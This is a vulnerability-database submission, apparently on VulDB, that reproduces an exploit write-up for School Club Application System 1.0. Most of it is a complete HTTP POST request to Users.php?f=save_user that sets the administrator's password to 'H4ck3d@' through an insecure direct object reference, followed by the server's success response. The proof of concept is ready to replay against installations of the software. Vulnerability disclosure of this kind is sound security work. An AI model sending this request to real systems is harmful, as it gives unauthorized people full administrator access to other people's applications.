제출 #34399: School Club Application System (SCAS) 1.0 - Authentication Bypass
| 제목 | School Club Application System (SCAS) 1.0 - Authentication Bypass |
|---|---|
| 설명 | # Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass # Date: 2022-04-09 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ School Club Application System (SCAS) 1.0 - Authentication Bypass Summary: ================ School Club Application System (SCAS) in version 1.0 is vulnerable to bypass authentication by changing administrator password by insecure direct object reference (IDOR) attack, for this reason, attacker can gain full access to administrator account by resetting its password. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Affected Product: ================ School Club Application System v1.0 Steps to Reproduce: ================ Request: POST /scas/classes/Users.php?f=save_user HTTP/1.1 Host: target.com Content-Length: 785 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA Origin: http://target.com Referer: http://target.com/scas/admin/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="firstname" Administrator ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="password" H4ck3d@ ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryOJM0GBfl6KS1ELuA-- Response: HTTP/1.1 200 OK Date: Sat, 09 Apr 2022 15:16:38 GMT Server: Apache/2.4.52 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} |
| 원천 | ⚠️ https:/ |
| 사용자 | mrempy (UID 24379) |
| 제출 | 2022. 04. 09. PM 05:32 (4 연령 ago) |
| 모더레이션 | 2022. 04. 09. PM 08:16 (3 hours later) |
| 상태 | 수락 |
| VulDB 항목 | 196750 [School Club Application System 1.0 Users.php?f=save_user 권한 상승] |
| 포인트들 | 20 |